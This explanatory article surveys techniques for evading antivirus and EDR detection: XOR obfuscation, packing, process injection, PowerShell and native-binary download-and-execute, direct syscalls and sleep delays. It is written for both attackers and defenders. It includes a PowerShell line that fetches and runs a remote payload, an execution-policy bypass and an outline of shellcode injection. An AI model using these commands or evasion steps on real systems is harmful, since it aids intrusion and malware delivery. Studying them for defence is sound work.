Evading AV and EDR Solutions: A Deep Dive

Introduction

In the dynamic landscape of cybersecurity, evasion techniques are constantly evolving as defenders strive to enhance threat detection capabilities. Antivirus (AV) and Endpoint Detection and Response (EDR) solutions are cornerstone defenses, aiming to prevent and detect malicious activity on endpoints. However, sophisticated adversaries continuously develop methods to bypass these security measures, posing a significant challenge. This article delves into the realm of AV and EDR evasion, exploring common techniques, their prerequisites, advantages, disadvantages, and real-world examples. Understanding these evasion methods is crucial for both attackers and defenders, enabling a more informed approach to security.

Prerequisites: Understanding the Battlefield

Before diving into specific evasion techniques, it’s essential to grasp the fundamentals of how AV and EDR solutions operate.

Antivirus (AV): AV solutions primarily rely on signature-based detection, comparing file hashes and code snippets against a database of known malware signatures. Heuristic analysis is also employed to identify suspicious behavior based on code patterns and API calls.

Endpoint Detection and Response (EDR): EDR goes beyond traditional AV by continuously monitoring endpoint activity, including process execution, network connections, file modifications, and registry changes. It utilizes behavioral analysis, threat intelligence, and machine learning to detect anomalies and suspicious patterns, providing a more holistic view of endpoint security.

Therefore, successfully evading these solutions requires a deep understanding of these underlying mechanisms, which includes knowing how to dynamically analyze files, understand Windows API calls, network protocols, and potentially utilize memory analysis tools.

Categorizing Evasion Techniques

Evasion techniques can be broadly categorized into the following areas:

1. Obfuscation Techniques: These techniques aim to make malicious code less recognizable to AV and EDR solutions by altering its appearance without changing its functionality.
2. Exploitation Techniques: These techniques directly target vulnerabilities or misconfigurations in AV or EDR software to disable or bypass their security features.
3. Living off the Land (LOTL): This approach leverages legitimate system tools and processes to carry out malicious activities, making it harder to distinguish malicious actions from normal system operations.
4. Bypassing Memory Scanning: AV/EDR engines will often scan memory. Techniques to circumvent these protections include direct syscalls and other methods for avoiding user-mode hooks.
5. Time-Based Evasion: Techniques that leverage sleep timers or other delays to avoid detection during active scans.

1. Obfuscation Techniques

Polymorphism: Modifying the malicious code’s signature each time it is executed, making it difficult for signature-based AV to detect.

# Example of simple XOR encryption for code obfuscation
def obfuscate(code, key):
obfuscated_code = bytearray()
for i in range(len(code)):
obfuscated_code.append(code[i] ^ key)
return bytes(obfuscated_code)

# Usage example:
original_code = b"This is my malicious code"
encryption_key = 0x42 # Example key

obfuscated_code = obfuscate(original_code, encryption_key)
# Store and execute the obfuscated_code, then decrypt before actual execution

Advantages: Relatively easy to implement. Can bypass simple signature-based detection.

Disadvantages: Can be detected by heuristic analysis. Polymorphic engines themselves can be signatured. Simple techniques can be easily reversed.

Metamorphism: Rewriting the malicious code entirely while maintaining its functionality. This involves changing the code’s structure, control flow, and instructions.

Advantages: More effective than polymorphism. Significantly harder for signature-based detection.

Disadvantages: Complex to implement. Can be resource-intensive. Requires detailed understanding of target architecture.

Packing: Compressing and encrypting the malicious executable, making it harder to analyze. The unpacking routine decrypts and executes the original code.

Advantages: Hides code during static analysis. Commonly used and readily available tools.

Disadvantages: Unpacking routines can be detected. Packing can raise suspicion.

Code Injection: Injecting malicious code into legitimate processes.

# Simplified example of code injection using ctypes
import ctypes

# Get handle to process (e.g., notepad.exe) - Requires proper permissions
# pid = 1234  # Replace with actual PID
# process_handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, pid)

# Allocate memory in the target process
# address = ctypes.windll.kernel32.VirtualAllocEx(process_handle, 0, len(shellcode), 0x3000, 0x40)

# Write the shellcode to the allocated memory
# written = ctypes.c_ulong(0)
# ctypes.windll.kernel32.WriteProcessMemory(process_handle, address, shellcode, len(shellcode), ctypes.byref(written))

# Create a thread to execute the injected code
# thread_id = ctypes.c_ulong(0)
# thread_handle = ctypes.windll.kernel32.CreateRemoteThread(process_handle, None, 0, address, None, 0, ctypes.byref(thread_id))

Advantages: Hides malicious code within a trusted process. Bypasses application whitelisting in some cases.

Disadvantages: Requires elevated privileges. Can be detected by monitoring API calls (e.g., WriteProcessMemory, CreateRemoteThread).

2. Exploitation Techniques

Exploiting Vulnerabilities: Targeting known or zero-day vulnerabilities in AV/EDR software to disable or bypass security features.

Advantages: Highly effective if successful. Can completely disable AV/EDR.

Disadvantages: Requires significant expertise and time to discover and exploit vulnerabilities. Exploits are often quickly patched.

Misconfiguration Abuse: Exploiting misconfigured settings in AV/EDR policies to allow malicious activity. For instance, whitelisting specific directories or processes.

Advantages: Relatively easy to exploit. Can be highly effective if misconfigurations exist.

Disadvantages: Relies on the existence of misconfigurations. Less common in hardened environments.

3. Living off the Land (LOTL)

Using PowerShell for Malicious Activities: PowerShell is a powerful scripting language built into Windows. Attackers can leverage it to download and execute payloads, modify system settings, and perform other malicious tasks.

# Download and execute a payload from a remote server
IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')

# Bypass execution policy
powershell.exe -ExecutionPolicy Bypass -File ./malicious_script.ps1

Advantages: Blends in with legitimate system activity. PowerShell is widely used by administrators.

Disadvantages: PowerShell logging can detect suspicious activity. PowerShell execution policies can be configured to restrict execution.

Leveraging Native System Tools: Using tools like certutil.exe, regsvr32.exe, or mshta.exe for downloading and executing payloads.

Advantages: Avoids the need to download additional tools. Trusted system binaries.

Disadvantages: Usage patterns can be detected.

4. Bypassing Memory Scanning

Direct Syscalls: Instead of using the standard Windows API, directly invoke system calls. This bypasses user-mode hooking techniques commonly used by AV/EDR solutions. Libraries such as SysWhispers can automate this process.

Unlinking from Memory: Unlinking a malicious DLL from memory after it has been loaded can make it harder for memory scans to detect it.

5. Time-Based Evasion

Sleep Timers: Introducing delays in the execution of malicious code can help avoid detection during active scans.

import time
time.sleep(60) # Sleep for 60 seconds
# Execute malicious code after the delay

Advantages: Simple to implement. Can be effective against signature based detection.

Disadvantages: Suspicious delays can be detected by behavioral analysis.

Advantages of Using Evasion Techniques (for Attackers)

• Bypass security controls.
• Maintain persistence on compromised systems.
• Avoid detection by security personnel.
• Successfully exfiltrate data.

Disadvantages of Using Evasion Techniques (for Attackers)

• Requires advanced technical skills.
• Time-consuming to implement and maintain.
• Can be detected by sophisticated security solutions.
• May trigger alerts even if evasion is successful.

Features of Effective Evasion Techniques

• Dynamic: Adapting to changing security landscapes and detection methods.
• Stealthy: Minimizing the footprint and noise generated by malicious activity.
• Customizable: Tailoring techniques to specific target environments.
• Resilient: Difficult to detect and reverse engineer.

Conclusion

Evading AV and EDR solutions is a continuous cat-and-mouse game. While attackers constantly innovate new evasion techniques, defenders must enhance their detection capabilities and adapt their security strategies accordingly. A strong defense-in-depth approach, combined with proactive threat hunting and continuous monitoring, is crucial for mitigating the risks posed by sophisticated adversaries. Ultimately, a comprehensive understanding of both offensive and defensive techniques is essential for maintaining a robust security posture in today’s threat landscape.